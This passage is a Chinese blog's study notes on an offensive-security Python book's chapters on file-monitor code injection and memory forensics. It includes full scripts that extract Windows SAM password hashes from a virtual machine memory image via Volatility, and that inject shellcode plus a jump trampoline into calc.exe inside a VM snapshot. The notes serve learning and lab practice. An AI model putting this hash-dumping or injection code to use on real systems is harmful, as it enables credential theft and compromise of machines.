  82. print "[vvv] Dumping contents..."
  83. try:
  84. # 打开文件读数据
  85. fd = open(full_filename, "rb")
  86. contents = fd.read()
  87. fd.close()
  88. print contents
  89. print "[^^^] Dump complete."
  90. except:
  91. print "[!!!] Failed."
  92. # 文件和文件扩展名分离
  93. filename, extension = os.path.splitext(full_filename)
  94. if extension in file_types:
  95. inject_code(full_filename, extension, contents)
  96. # 重命名哪个文件
  97. elif action == FILE_RENAMED_FROM:
  98. print "[ > ] Renamed from: %s" % full_filename
  99. # 重命名后的文件名是?
  100. elif action == FILE_RENAMED_TO:
  101. print "[ < ] Renamed to: %s" % full_filename
  102. else:
  103. print "[???] Unknown: %s" % full_filename
  104. except:
  105. pass
  106. for path in dirs_to_monitor:
  107. monitor_thread = threading.Thread(target=start_monitor,args=(path,))
  108. print "Spawning monitoring thread for path: %s" % path
  109. monitor_thread.start()

 

先安装启动漏洞示例服务

 

再执行上面的脚本

但并没有作者所说的那样有个vbs文件创建,于是我就自己创建了了个vbs文件

可以看到有编码问题,但最后各种尝试还是不行,指导原理就好,没看书的可能不知道这里是干嘛的

 

第十一章 自动化攻击取证

工具安装

Volatility ————高级内存取证框架工具

https://code.google.com/archive/p/volatility/downloads

我分享的源代码也有

这个下个源代码就额可以了,exe太污染系统了

 

工具配置

首先要获取内存镜像,各种百度谷歌,才找到了:

http://www.downloadcrew.com/article/23854-dumpit

 

参考文章:http://wenku.baidu.com/view/eec311e381c758f5f61f671a.html

MoonSols DumpIt是一款同时支持Win32dd和Win64dd的内存副本获取工具。用户只需双击DumpIt.exe可执行程序,并在提示问题后面输入y(如下图),等待几分钟时间即可在当前目录下生成主机物理内存的副本(如图2.3所示),该副本文件是以*.raw为后缀的镜像文件。raw是未经处理的意思,即使用该工具对物理内存进行拷贝是按每一个bit进行深度复制,即按原样进行复制,这样可以避免丢失一些重要数据。

 

 

出来了,9.多G,吓尿了

 

这是在我的真实机win7上运行结果

 

xp虚拟机结果(最重要的信息是红色那)

 

 

抓取口令的哈希值

由于我们是对VMWare虚拟机进行试验,我还是开winxp的虚拟机做实验,不知道需不需要打开,反正就先开了winxp虚拟机

 

我们可以看到虚拟机的vmem文件,这个应该是快照有关的文件,因为我保存了三个快照

 

 

 

抓取注册表的值在内存中的位置

 

 

可以看到底部的SAM和system的键值所在的虚拟地址和物理内存地址

虚拟地址:是在操作系统内存中的偏移

物理地址:是在.vmem文件中的偏移

 

接下来将虚拟地址传递给hashdump插件(-y是system的虚拟地址,-s是SAM的)

 

下面用python将上面连个步骤用编程实现

 

代码:

  1. #-*- coding:utf8 -*-
  2. """
  3. @version:
  4. @author: giantbranch
  5. @file: grabhashes.py
  6. @time: 2016/3/15 20:16
  7. """
  8. import sys
  9. import struct
  10. import volatility.conf as conf
  11. import volatility.registry as registry
  12. # 要分析的内存文件位置
  13. memory_file = "D:\\Windows XP Professional-f6b49762.vmem"
  14. # volatility的下载的路径
  15. sys.path.append("D:\\volatility-2.3")
  16. registry.PluginImporter()
  17. config = conf.ConfObject()
  18. import volatility.commands as commands
  19. import volatility.addrspace as addrspace
  20. config.parse_options()
  21. config.PROFILE = "WinXPSP3x86"
  22. config.LOCATION = "file://%s" % memory_file
  23. # 注册全局参数
  24. registry.register_global_options(config, commands.Command)
  25. registry.register_global_options(config, addrspace.BaseAddressSpace)
  26. from volatility.plugins.registry.registryapi import RegistryApi
  27. from volatility.plugins.registry.lsadump import HashDump
  28. # 实例化一个RegistryApi类对象(包含常用的注册表帮助类)
  29. registry = RegistryApi(config)
  30. # 等同与hivelist命令
  31. registry.populate_offsets()
  32. sam_offset = None
  33. sys_offset = None
  34. # 循环检索SAM和system键值
  35. for offset in registry.all_offsets:
  36. if registry.all_offsets[offset].endswith("\\SAM"):
  37. sam_offset = offset
  38. print "[*] SAM: 0x%08x" % offset
  39. if registry.all_offsets[offset].endswith("\\system"):
  40. sys_offset = offset
  41. print "[*] System: 0x%08x" % offset
  42. if sam_offset is not None and sys_offset is not None:
  43. config.sys_offset = sys_offset
  44. config.sam_offset = sam_offset
  45. # 创建HashDump对象
  46. hashdump = HashDump(config)
  47. for hash in hashdump.calculate():
  48. print hash
  49. break
  50. if sam_offset is None or sys_offset is None:
  51. print "[*] Failed to find the system or SAM offsets."

 

出错记录:(路径出现了中文,编程的目录还是用英文命名为好)

 

复制到D盘根目录解决

 

 

 

实验结果:

 

成功,好耶!!!

 

终于来到最后一课了

 

直接代码注入

代码:

  1. #-*- coding:utf8 -*-
  2. """
  3. @version:
  4. @author: giantbranch
  5. @file: codecoverage.py
  6. @time: 2016/3/15 23:15
  7. """
  8. from immlib import *
  9. class cc_hook(LogBpHook):
  10. def __init__(self):
  11. LogBpHook.__init__(self)
  12. self.imm = Debugger()
  13. def run(self, regs):
  14. self.imm.log("%08x" % regs['EIP'], regs['EIP'])
  15. self.imm.deleteBreakpoint(regs['EIP'])
  16. return
  17. def main(args):
  18. imm = Debugger()
  19. calc = imm.getModule("calc.exe")
  20. imm.analyseCode(calc.getCodebase())
  21. functions = imm.getAllFunctions(calc.getCodebase())
  22. hooker = cc_hook()
  23. for function in functions:
  24. hooker.add("%08x" % function, function)
  25. return "Tracking %d functions." % len(functions)

 

  1. #-*- coding:utf8 -*-
  2. """
  3. @version:
  4. @author: giantbranch
  5. @file: code_inject.py
  6. @time: 2016/3/16 13:04
  7. """
  8. import sys
  9. import struct
  10. equals_button = 0x01005D51
  11. # 要分析的内存文件位置
  12. memory_file = "D:\\Windows XP Professional-f6b49762.vmem"
  13. slack_space = None
  14. trampoline_offset = None
  15. # 读入我们的shellcode
  16. sc_fd = open("cmeasure.bin", "rb")
  17. sc = sc_fd.read()
  18. sc_fd.close()
  19. sys.path.append("D:\\volatility-2.3")
  20. import volatility.conf as conf
  21. import volatility.registry as registry
  22. registry.PluginImporter()
  23. config = conf.ConfObject()
  24. import volatility.commands as commands
  25. import volatility.addrspace as addrspace
  26. registry.register_global_options(config, commands.Command)
  27. registry.register_global_options(config, addrspace.BaseAddressSpace)
  28. config.parse_options()
  29. config.PROFILE = "WinXPSP3x86"
  30. config.LOCATION = "file://%s" % memory_file
  31. import volatility.plugins.taskmods as taskmods
  32. p = taskmods.PSList(config)
  33. for process in p.calculate():
  34. if str(process.ImageFileName) == "calc.exe":
  35. print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
  36. print "[*] Hunting for physical offsets...please wait."
  37. address_space = process.get_process_address_space()
  38. pages = address_space.get_available_pages()
  39. # page[0]:页面地址
  40. # page[1]:页面大小
  41. for page in pages:
  42. physical = address_space.vtop(page[0])
  43. if physical is not None:
  44. fd = open(memory_file, "r+")
  45. fd.seek(physical)
  46. buf = fd.read(page[1])
  47. try:
  48. offset = buf.index("\x00" * len(sc))
  49. slack_space = page[0] + offset
  50. print "[*] Found good shellcode location!"
  51. print "[*] Virtual address: 0x%08x" % slack_space
  52. print "[*] Physical address: 0x%08x" % (physical + offset)
  53. print "[*] Injecting shellcode."
  54. fd.seek(physical + offset)
  55. fd.write(sc)
  56. fd.flush()
  57. # 创建我们的跳转代码
  58. # 对应的汇编指令为:
  59. # mov ebx, ADDRESS_OF_SHELLCODE( shellcode地址)
  60. # jmp ebx
  61. tramp = "\xbb%s" % struct.pack("<L", page[0] + offset)
  62. tramp += "\xff\xe3"
  63. if trampoline_offset is not None:
  64. break
  65. except:
  66. pass
  67. fd.close()
  68. # 查看目标代码的位置
  69. if page[0] <= equals_button and equals_button < (page[0] + page[1] -7):
  70. print "[*] Found our trampoline target at: 0x%08x" % (physical)
  71. # 计算虚拟偏移
  72. v_offset = equals_button - page[0]
  73. # 计算物理偏移
  74. trampoline_offset = physical+ v_offset
  75. print "[*] Found our trampoline target at: 0x%08x" % (trampoline_offset)
  76. if slack_space is not None:
  77. break
  78. print "[*] Writing trampoline..."
  79. fd = open(memory_file, "r+")
  80. fd.seek(trampoline_offset)
  81. fd.write(tramp)
  82. fd.close()
  83. print "[*] Done injecting code."


 

点击等号时出现了两条消息

 



但改成那两个地址还是没用,由于逆向功夫渣,实验再次失败

 

 


 

 

 

 

终于学完了,也敲完代码了,其中有好几个都没成功实践出作者的预期结果,知道我哪里错的,欢迎指点。

最后感谢 用户  mackf qq_31229763 的鼓励

 

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Cpp五条/article/detail/219455
推荐阅读
相关标签
  

闽ICP备14008679号